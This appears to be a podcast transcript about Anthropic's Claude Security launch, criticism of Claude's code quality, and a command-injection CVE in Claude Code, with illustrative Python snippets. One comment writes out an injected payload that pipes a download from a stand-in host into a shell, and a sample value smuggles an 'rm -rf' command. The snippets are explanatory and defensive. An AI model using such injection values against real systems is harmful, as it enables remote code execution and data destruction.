THE RUNDOWN AI
Anthropic Claude Security 4.7 Code Analysis: A Breakdown
Anthropic launched Claude Security to scan code and auto-patch vulnerabilities using Opus 4.7, though concerns persist regarding the model's output quality.
HOST
From DailyListen, I'm Alex. Anthropic just launched Claude Security in public beta. It's a tool for enterprise customers to scan codebases for vulnerabilities and spit out fixes, powered by their Opus 4.7 model. Hundreds of organizations already tested it in preview and found bugs that other tools missed for years. But this comes right as cyber experts slam Claude for pumping out insecure code itself—code quality down 47.3% since Opus 4.6 dropped. Does this fix the mess or just highlight it? We're joined by Priya, our technology analyst, who tracks how AI tools reshape security workflows.
PRIYA
What this unlocks is enterprise teams scanning entire codebases with Opus 4.7 and getting patch suggestions in minutes. No need to build custom agents or wait on API tweaks. You access it straight from the Claude.ai sidebar, with Slack webhooks piping alerts into your ticketing setup. Hundreds of orgs in the research preview caught exploits missed by traditional scanners for years. Anthropic's Frontier Red Team used Opus 4.6 to find over 500 vulnerabilities in production open-source code—stuff that sat undetected despite expert reviews. They stress-tested it in Capture-the-Flag events and partnered with Pacific Northwest National Laboratory on critical infrastructure defense. Now Claude Security prioritizes fixes, reasoning like a researcher over full repos. It's Claude Enterprise only, but lowers the bar for teams short on AI devs.
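For listeners following along, alert routing like this usually boils down to a JSON POST to a Slack incoming webhook. A minimal sketch, with an illustrative URL and payload shape (Claude Security's actual webhook schema isn't public, so the field names and helper functions here are assumptions):

```python
import json
import urllib.request

# Hypothetical example of routing a vulnerability alert to a Slack
# incoming webhook. The URL and payload fields are illustrative
# assumptions, not Anthropic's documented schema.
WEBHOOK_URL = "https://hooks.slack.com/services/T000/B000/XXXX"  # placeholder

def build_alert(repo: str, cve: str, severity: str) -> bytes:
    """Build a Slack-style JSON payload for a vulnerability finding."""
    payload = {"text": f"[{severity}] {cve} detected in {repo} - patch suggested"}
    return json.dumps(payload).encode("utf-8")

def send_alert(body: bytes) -> None:
    """POST the payload to the webhook (network call, not invoked here)."""
    req = urllib.request.Request(
        WEBHOOK_URL,
        data=body,
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)

body = build_alert("payments-service", "CVE-2026-35022", "high")
```

From there, a ticketing integration would just call `send_alert(body)` whenever a scan surfaces a finding.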
HOST
Over 500 vulnerabilities in open-source code that experts missed for years—that's wild. But Dave Kennedy at TrustedSec says Claude's code output tanked 47.3% in quality since Opus 4.6 launched in early February. Developers there saw serious defects creep in. How does Anthropic square launching a security tool when their own models are reportedly generating buggy code?
PRIYA
The interesting piece is that Anthropic's own tools, the Claude Code CLI and Agent SDK, had an OS command injection flaw: CVE-2026-35022. NIST logged it April 29th, affecting claude_code versions up to 2.1.91 and claude_agent_sdk up to 0.1.55. It hits authentication helpers run with shell=True and no input checks, risking credential theft in CI/CD pipelines. VulnCheck, which submitted the CVE April 6th, later flagged it as disputed. Kennedy's tool measured Claude's output quality, tracking bugs, security holes, and completion rates, and found a 47.3% drop over the five weeks since Opus 4.6's launch. He calls it "unusably bad," with Opus 4.7 only marginally better. TrustedSec devs ditched it after performance nosedived in March. A senior AMD AI exec labeled Claude Code "unusable for complex tasks." Users like Muratcan Koylan at Sully.ai accused the team of gaslighting complaints. Anthropic blamed latency tweaks and token feedback, but subscriptions were canceled anyway.
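To make that flaw class concrete: running a helper with shell=True and splicing user input into the command string is textbook command injection. This sketch illustrates the pattern and the standard fix; it is NOT Anthropic's actual helper code, and the names are made up for the example:

```python
import subprocess  # used by the vulnerable variant below

# Illustrative sketch of the flaw class described in the CVE (command
# injection via shell=True with unvalidated input). Not Anthropic's
# actual code; "auth-helper" and these functions are hypothetical.

def run_auth_helper_unsafe(token: str) -> None:
    # VULNERABLE: token is spliced into a shell string, so input like
    # "x; curl evil.example | sh" runs arbitrary commands.
    subprocess.run(f"auth-helper --token {token}", shell=True)

def build_auth_argv(token: str) -> list[str]:
    # SAFER: build an argument list and skip the shell entirely, so the
    # token stays a single argv entry and can't inject commands.
    # Invocation would be: subprocess.run(build_auth_argv(token), shell=False)
    return ["auth-helper", "--token", token]

argv = build_auth_argv("abc; rm -rf /tmp/x")
```

The argument-list form leaves a malicious token inert: it arrives at the helper as one literal string rather than being parsed by a shell.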
HOST
Gaslighting complaints while valued at $380 billion? Kennedy built his own tool to quantify that 47.3% drop in code quality, security issues included. And now this CVE in their own dev tools—VulnCheck calls it disputed. Does Claude Security address flaws like that, or is it blind to its own mess?
PRIYA
Claude Security spots vulns in your code; it doesn't self-diagnose. It uses Opus 4.7 to reason over repos and propose patches, but we lack details on Anthropic's remediation for CVE-2026-35022: no patch status or exploit conditions are public. The disputed tag from VulnCheck flags uncertainty between them and Anthropic. No CVSS score or severity rating from NIST yet. Kennedy's metric tracks real declines: the rate of code finishing jobs cleanly fell off a cliff post-4.6. Opus 4.7 powers the tool, and Anthropic claims it's top-tier for vuln hunting, but if models degrade, fixes could inherit bugs. Hundreds of orgs tested the preview successfully, yet Forbes warned April 22nd that Claude pumps out vulnerable code. No word on org impacts or real exploits from the CVE.
HOST
No public patch details or severity score for that CVE, fair gap to flag. But Anthropic says today's models already nail flaw-finding, per their blog. Project Glasswing ties in; what's that angle amid these code quality gripes?
PRIYA
Project Glasswing, which debuted earlier this month, targets vulns in global open-source infrastructure, like an AI Manhattan Project. Vulnerability scanning is the core of both it and Claude Security. Opus 4.7 blocks broad vuln-scanning to avoid offensive use, but approved Cyber Verification Program researchers get access. Claude Mythos Preview stays locked to Glasswing participants. Meanwhile, Anthropic's Red Team refined Opus 4.6 on real zero-days: over 500 in open-source code, per their site. They entered Capture-the-Flag competitions and ran lab exercises on critical infrastructure defense. Claude Security builds on that: open a session, apply fixes in context, skip the eng-sec back-and-forth. But critics like Faisal Amjad, in a February 23rd LinkedIn analysis, question whether degraded models undermine it. No exploitation details on the hundreds of preview orgs either; that's a pure gap.
HOST
Ties right into those 500 zero-days their Red Team found. From research preview in February as Claude Code Security to public beta now—hundreds of orgs used it. But nearly half of cyber pros want out of the field amid AI shifts. Does this tool actually speed up fixes enough to matter for busy teams?
PRIYA
It cuts days of coordination. Security flags a vuln, Claude Security ranks it, generates an Opus 4.7 patch, and you test in-session. Webhooks hit Slack with no config hassles. Existing scanners had missed the preview's finds for years. Apply via claude.com/contact-sales/security for Enterprise. But limitations hit: no API or agent builds by design, so non-dev teams adopt fast, while power users wanting custom stacks wait. Gaps persist too, like the missing CVE impact data on exploited orgs. Cyber pros face burnout, with nearly half eyeing exits, while tools like this automate grunt work. Dave Kennedy's 47.3% quality drop raises the question of whether AI-generated patches introduce new holes. Anthropic hit a $380 billion valuation pushing a defense-first posture, yet the vuln in their own CLI and SDK is an irony. The Red Team's 500+ finds prove capability, but model drift puts it at risk.
HOST
Power users might chafe at no API, but Slack hooks make it plug-and-play. Kennedy says Opus 4.7's "marginally better," not back to 4.6 levels. TrustedSec bailed in March. How's Anthropic responding to the revolt—any fixes beyond this beta?
PRIYA
They acknowledged engineering missteps caused Claude Code's month-long decline, which sparked cancellations. Execs first pinned it on latency improvements and token-usage tweaks made at users' request. There's no full transparency on compute crunches or patches; Fortune covered the backlash April 14th. Claude Code Review agents check PRs for bugs separately. For Security, it's a defensive Opus 4.7 carve-out. But no CVE-2026-35022 resolution is public: the disputed tag lingers, with no root cause or proof of concept. Kennedy's tracker shows security issues in output worsened as part of the 47.3% decline. Muratcan Koylan blasted the gaslighting on X. A senior AMD exec trashed it for complex work. This beta broadens access after the preview's success, but without addressing model quality, it risks flawed fixes. The Red Team's CTF wins and PNNL partnership show promise, yet user pain is real.
HOST
That disputed CVE in their auth helpers: no input validation, shell=True. VulnCheck submitted it April 6th, NIST analyzed it April 29th. Three change records already. Does Claude Security help teams dodge issues like that in their own pipelines?
PRIYA
Exactly the use case. Feed your codebase, CLI, SDK, whatever, into Claude Security. Opus 4.7 scans for injection flaws like CVE-2026-35022's helper execution and proposes fixes in place. Preview orgs caught persistent bugs this way. But the irony bites: Anthropic's own tools were vulnerable, with the CVE disputed by VulnCheck. No severity metrics or exploit proofs are available, and no org breach details. Kennedy warns a degraded Claude injects similar flaws, with output 47.3% worse. Opus 4.7 claims strength in patching, backed by the Red Team's 500+ zero-days. Glasswing extends the approach to open-source infrastructure. For Enterprise, it's sidebar-simple and Slack-routed. Quit-threat levels among cyber pros rise as AI both aids and errs. The first AI vuln scan I recall was Codex, back in a September years ago; Claude advances it, but its own issues expose gaps.
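As a toy illustration of what an injection scan is hunting for in a pipeline: flag any subprocess call that passes shell=True. Real tools, and presumably Claude Security, do semantic analysis rather than regex matching; this just shows the target pattern, and all names here are made up:

```python
import re

# Toy illustration of a shell=True scan over source text. Real scanners
# use taint/semantic analysis; a regex only demonstrates the pattern.
PATTERN = re.compile(r"subprocess\.\w+\([^)]*shell\s*=\s*True")

def flag_shell_true(source: str) -> list[int]:
    """Return 1-based line numbers that invoke subprocess with shell=True."""
    return [
        lineno
        for lineno, line in enumerate(source.splitlines(), start=1)
        if PATTERN.search(line)
    ]

snippet = 'ok = subprocess.run(["ls"])\nbad = subprocess.run(cmd, shell=True)\n'
flagged = flag_shell_true(snippet)
```

A repo-scale tool would then rank each flagged line by reachability from untrusted input, which is where LLM reasoning over full context earns its keep.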
HOST
Preview started February as Claude Code Security—now beta for Enterprise. Red Team's critical infra work with PNNL sounds heavy. But with user cancellations and "unusable" calls, will teams trust AI fixes over humans?
PRIYA
Trust builds on results: hundreds of orgs fixed production exploits scanners ignored for years. The Red Team's CTF entries and zero-day hauls (links on red.anthropic.com) prove it. The PNNL partnership defended infrastructure models. Claude reasons over full-repo context and prioritizes fixes, with no bespoke builds needed. But counters loom: Kennedy's "unusably bad" after the 47.3% drop, the AMD exec's verdict, Koylan's gaslighting charge. Subscriptions fled. Anthropic admits missteps, with no full patch timeline for their CVE. Gaps block the full picture: no impact data, no severity scores. Forbes, April 22nd: Claude outputs vulnerable code. Nearly half of security pros are near burnout. It speeds triage, but humans validate. The beta opens things up more broadly, via the Claude.ai sidebar for Enterprise, yet model quality doubts linger.
HOST
Humans still in loop for patches—smart. Project Glasswing locks Mythos to select researchers only. Ties to Cyber Verification Program. Amid all this, what's the real-world shift for a dev team right now?
PRIYA
Devs open Claude Security, scan repo, get ranked Opus 4.7 patches in context. Apply, test, Slack alert—no eng-sec ping-pong. Hundreds did it in preview. Red Team found 500+ long-hidden vulns. But Kennedy's metric—47.3% worse code, security flaws up—means caution. Their own CVE-2026-35022 unpatched publicly, disputed. No exploit data. Model decline hit post-4.6 February release; 4.7 inches up. TrustedSec dumped it March. Cancellations rose. Anthropic eyes cyber defense long-term—Glasswing scans open-source world. Enterprise gets beta now; others wait. Burnout hits cyber field hard. Tools like this cut workload, but verify outputs. First Codex scans years ago pale next to this repo-scale reasoning.
HOST
Repo-scale reasoning over whole codebases—beats old line-by-line scanners. But that 47.3% quality plunge per Kennedy's tool, from five weeks back. Users revolted last month. Beta feels like course-correction?
PRIYA
The beta expands what worked in preview, vuln discovery and patches, for Enterprise. Sidebar access, no API fuss. Slack ties in. The Red Team validated on 500+ zero-days, CTFs, and the PNNL work. Anthropic calls the model "highly effective" at finding code flaws. But the revolt is real: performance tanked, missteps were admitted. No CVE remediation details, impacts unknown, disputed tag lingering. Kennedy: a 47.3% drop in bug-free completions, "unusably bad." Opus 4.7 hasn't fully recovered. The AMD exec: unusable for complex work. Koylan: gaslighting. Subscriptions gone. A $380B firm pushes the cyber angle amid the irony. Teams gain speed, but should audit AI fixes. Glasswing hints at something bigger: AI for global OSS security. Preview success versus output risks: pick your lens.
HOST
I'm Alex. Anthropic's Claude Security beta promises fast vuln scans and fixes for Enterprise, backed by Red Team wins like 500 zero-days. But cyber voices like Dave Kennedy flag 47.3% worse code quality since Opus 4.6, their own disputed CVE, and user backlash. Gaps remain on patches and impacts. Facts point to tools accelerating security, with AI flaws demanding checks. Check SiliconANGLE, Pulse 2.0, Forbes for more. Thanks for listening to DailyListen.
Sources
1. Anthropic's Claude Is Pumping Out Vulnerable Code, Cyber Experts ...
2. NVD - CVE-2026-35022
3. Anthropic announces Claude Security public beta to find and fix software vulnerabilities - SiliconANGLE
4. Anthropic Launches Claude Security In Public Beta For Enterprise ...
5. Anthropic Launches Claude Security: 5 Things To Know - CRN
6. Anthropic's new Claude Security tool scans your codebase for flaws
7. Claude Code Security Analysis – February 2026 – 02/23/26 - LinkedIn
8. Making frontier cybersecurity capabilities available to defenders
9. Anthropic explains Claude Code's recent performance decline after ...
10. Why the Public Can't Access Anthropic's Newest AI - YouTube
11. Anthropic AI not returning Output completion - Questions - Make Community
Original Article
Anthropic launches Claude Security
The Rundown AI · May 1, 2026